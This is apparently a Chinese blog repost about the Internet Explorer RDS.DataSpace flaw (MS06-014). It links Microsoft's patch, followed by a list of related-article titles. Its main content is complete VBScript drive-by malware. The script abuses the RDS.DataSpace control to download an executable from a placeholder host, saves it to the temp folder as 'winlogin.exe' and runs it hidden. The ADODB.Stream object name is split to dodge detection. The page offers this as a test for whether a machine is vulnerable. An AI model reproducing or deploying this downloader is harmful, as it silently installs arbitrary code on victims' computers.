【最新漏洞】IE中使用Rds.DataSpace下载并运行病毒文件
2018-10-12 14:08
701 查看
请执行下面的代码测试您的机器是否存在漏洞:
补丁下载:http://www.microsoft.com/china/technet/Security/bulletin/ms06-014.mspx
相关病毒的vbs代码如下:
补丁下载:http://www.microsoft.com/china/technet/Security/bulletin/ms06-014.mspx
相关病毒的vbs代码如下:
on error resume next
dl = "http://www.xxx.com/xxx.exe"
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"
Set x = df.CreateObject(str,"")
a1="Ado"
a2="db."
a3="Str"
a4="eam"
str1=a1&a2&a3&a4
str5=str1
set S = df.createobject(str5,"")
S.type = 1
str6="GET"
x.Open str6, dl, False
x.Send
fname1="winlogin.exe"
set F = df.createobject("Scripting.FileSystemObject","")
set tmp = F.GetSpecialFolder(2)
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
set Q = df.createobject("Shell.Application","")
Q.ShellExecute fname1,"","","open",0
相关文章推荐
- 【最新漏洞】IE中使用Rds.DataSpace下载并运行病毒文件
- 解决使用超链接下载word/EXCEL文件时被IE打开的问题
- 使用Mysql.data.dll文件在服务器上运行访问Mysql
- html Demo工具类:网页使用ie另存为htm文件时,css样式文件的图片路径不对,进行修改,并下载图片
- 使用alter tablespace create datafile恢复丢失的数据文件
- 微软发布2010年第一个IE 0day、"极光"ie高危漏洞警告的解决办法和最新官方补丁下载地址
- Windows/MS-Office/IE 最新严重漏洞下载 (2009/06/10~2009/08/12)
- HttpClient使用之下载远程服务器中的文件(注意目录遍历漏洞)
- IE使用ajaxFileUpload上传文件后台返回json类型前台弹出下载提示框
- 在ruby 2 和rails 4 里面使用send_file 下载文件的时候。在IE下面中文名出现乱码的处理方式
- HttpClient使用之下载远程服务器中的文件(注意目录遍历漏洞)
- IE最新高危漏洞非官方补丁开放下载(附源码)
- 关于使用struts2在IE下变成json文件下载
- 解决springmvc中文件下载功能中使用javax.servlet.ServletOutputStream out = response.getOutputStream();后运行出异常但结果正确的问题
- IE自动下载程序并运行的漏洞
- 解决Invalid white space character (0x …… 文件下载后可直接使用
- 配置ADS,使ADS编译出bin文件,并使用uboot下载运行成功
- Windows/MS-Office/IE 最新严重漏洞下载 (2009/09/09~2009/10/14)
- 使用Python从rds上下载mysql备份文件
- IE下使用js调用系统activex实现文件下载